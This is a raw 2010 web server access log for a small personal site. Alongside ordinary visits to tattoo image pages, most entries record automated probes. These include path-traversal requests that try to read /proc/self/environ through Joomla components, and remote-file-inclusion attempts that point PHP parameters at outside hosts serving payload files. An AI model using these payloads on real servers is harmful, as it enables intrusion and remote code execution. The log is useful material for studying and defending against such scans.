85.235.154.15 - - [21/Jun/2010:05:38:07 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.235.154.15 - - [21/Jun/2010:05:38:07 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.136.63.119 - - [21/Jun/2010:05:38:15 -0500] "GET /logs/access_log.1274832000//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
94.136.63.119 - - [21/Jun/2010:05:38:15 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
94.136.63.119 - - [21/Jun/2010:05:38:15 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.uzayyolu.com/tiyatro/idfeel.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
85.235.154.15 - - [21/Jun/2010:05:38:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
85.228.188.103 - - [21/Jun/2010:05:38:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&q=vintage+tattooflash&rlz=1I7ADSA_sv""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:33 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:42 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:43 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:44 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:38:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:00 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:01 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
85.228.188.103 - - [21/Jun/2010:05:39:01 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
211.53.209.67 - - [21/Jun/2010:05:39:04 -0500] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:05:39:04 -0500] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:05:39:04 -0500] "GET /logs/access_log.1272672000//includes/functions_mod_user.php?phpbb_root_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:05:39:08 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:05:39:08 -0500] "GET /logs/access_log.1274572800%20%20//Gallery/displayCategory.php?basepath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.53.209.67 - - [21/Jun/2010:05:39:10 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:39:21 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:39:21 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:39:21 -0500] "GET /logs/access_log.1274572800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:39:44 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:39:44 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.92.165.130 - - [21/Jun/2010:05:39:44 -0500] "GET /logs/access_log.1274572800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:05:40:47 -0500] "GET /logs/access_log.1274572800//main.php?sayfa=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:05:42:49 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 319 "-""Casper Bot Search"
67.228.62.66 - - [21/Jun/2010:05:42:49 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 324 "-""Casper Bot Search"
67.228.62.66 - - [21/Jun/2010:05:42:49 -0500] "GET /logs/access_log.1274572800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 348 "-""Casper Bot Search"
121.78.118.123 - - [21/Jun/2010:05:45:10 -0500] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:05:45:11 -0500] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:05:48:49 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:05:48:49 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:05:48:49 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:05:49:32 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:05:49:32 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:05:49:33 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.834"
121.78.118.123 - - [21/Jun/2010:05:51:31 -0500] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:05:51:32 -0500] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.191.94.188 - - [21/Jun/2010:05:54:17 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.191.94.188 - - [21/Jun/2010:05:54:17 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [21/Jun/2010:05:54:17 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [21/Jun/2010:05:55:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [21/Jun/2010:05:55:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.216.99 - - [21/Jun/2010:05:58:54 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:05:58:54 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.200.244.57 - - [21/Jun/2010:05:59:07 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:05:59:07 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.216.99 - - [21/Jun/2010:05:59:13 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:05:59:13 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
211.53.209.67 - - [21/Jun/2010:06:00:37 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.53.209.67 - - [21/Jun/2010:06:00:38 -0500] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.53.209.67 - - [21/Jun/2010:06:00:38 -0500] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.53.209.67 - - [21/Jun/2010:06:00:39 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.228.85.91 - - [21/Jun/2010:06:01:21 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:01:21 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:01:22 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:01:22 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:02:11 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
188.40.232.234 - - [21/Jun/2010:06:02:49 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
207.46.199.180 - - [21/Jun/2010:06:04:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.200.244.57 - - [21/Jun/2010:06:04:55 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.244.57 - - [21/Jun/2010:06:04:55 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.19.4.18 - - [21/Jun/2010:06:04:59 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
203.19.4.18 - - [21/Jun/2010:06:05:06 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
203.19.4.18 - - [21/Jun/2010:06:05:13 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.805"
67.228.85.91 - - [21/Jun/2010:06:06:10 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:06:10 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:06:17 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
67.228.85.91 - - [21/Jun/2010:06:06:17 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
209.200.244.57 - - [21/Jun/2010:06:06:23 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.216.99 - - [21/Jun/2010:06:06:39 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.216.99 - - [21/Jun/2010:06:06:41 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.85.91 - - [21/Jun/2010:06:06:48 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
88.191.94.188 - - [21/Jun/2010:06:06:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.191.94.188 - - [21/Jun/2010:06:06:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
